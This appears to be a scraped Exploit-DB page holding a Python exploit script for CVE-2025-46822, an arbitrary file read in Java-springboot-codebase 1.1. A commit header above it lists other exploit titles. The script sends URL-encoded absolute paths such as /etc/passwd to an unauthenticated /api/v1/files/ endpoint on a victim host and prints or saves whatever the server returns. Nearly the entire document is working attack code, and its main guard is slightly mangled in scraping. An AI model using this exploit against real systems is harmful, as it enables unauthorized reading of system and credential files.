d69eaacef8
8 changes to exploits/shellcodes/ghdb Java-springboot-codebase 1.1 - Arbitrary File Read ABB Cylon Aspect Studio 3.08.03 - Binary Planting ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass Microsoft Windows Server 2016 - Win32k Elevation of Privilege Windows 2024.15 - Unauthenticated Desktop Screenshot Capture
57 lines
No EOL
2.2 KiB
Python
Executable file
57 lines
No EOL
2.2 KiB
Python
Executable file
# Exploit Title: Java-springboot-codebase 1.1 - Arbitrary File Read
|
|
# Google Dork:
|
|
# Date: 23/May/2025
|
|
# Exploit Author: d3sca
|
|
# Vendor Homepage: https://github.com/OsamaTaher/Java-springboot-codebase
|
|
# Software Link: https://github.com/OsamaTaher/Java-springboot-codebase
|
|
# Version: [app version] 1.1
|
|
# Tested on: Debian Linux
|
|
# CVE : CVE-2025-46822
|
|
|
|
#usage: python3 cve-2025-46822.py http://victim.com /etc/passwd
|
|
|
|
import argparse
|
|
import requests
|
|
|
|
from urllib.parse import quote
|
|
def exploit(target, file_path, output=None):
|
|
# Ensure the file path is absolute
|
|
if not file_path.startswith('/'):
|
|
print("[!] Warning: File path is not absolute. Prepending '/' to make it absolute.")
|
|
file_path = '/' + file_path.lstrip('/')
|
|
|
|
# URL-encode the file path
|
|
encoded_path = quote(file_path, safe='')
|
|
|
|
# Construct the target URL
|
|
endpoint = f"/api/v1/files/{encoded_path}"
|
|
url = target.rstrip('/') + endpoint
|
|
print(f"[*] Attempting to retrieve: {file_path}")
|
|
print(f"[*] Sending request to: {url}")
|
|
try:
|
|
response = requests.get(url, allow_redirects=False, timeout=10)
|
|
|
|
if response.status_code == 200:
|
|
print("[+] File retrieved successfully!")
|
|
if output:
|
|
with open(output, 'wb') as f:
|
|
f.write(response.content)
|
|
print(f"[+] Content saved to: {output}")
|
|
else:
|
|
print("\nFile contents:")
|
|
print(response.text)
|
|
else:
|
|
print(f"[-] Failed to retrieve file. Status code: {response.status_code}")
|
|
print(f"[-] Response: {response.text[:200]}") # Show first 200 chars of response
|
|
except Exception as e:
|
|
print(f"[-] An error occurred: {str(e)}")
|
|
|
|
if name == "main":
|
|
parser = argparse.ArgumentParser(description="Exploit Path Traversal Vulnerability in Unauthenticated File API")
|
|
parser.add_argument("target", help="Target base URL (e.g., http://victim:8080)")
|
|
parser.add_argument("file_path", help="Absolute path to target file (e.g., /etc/passwd)")
|
|
parser.add_argument("-o", "--output", help="Output file to save contents")
|
|
|
|
args = parser.parse_args()
|
|
|
|
exploit(args.target, args.file_path, args.output) |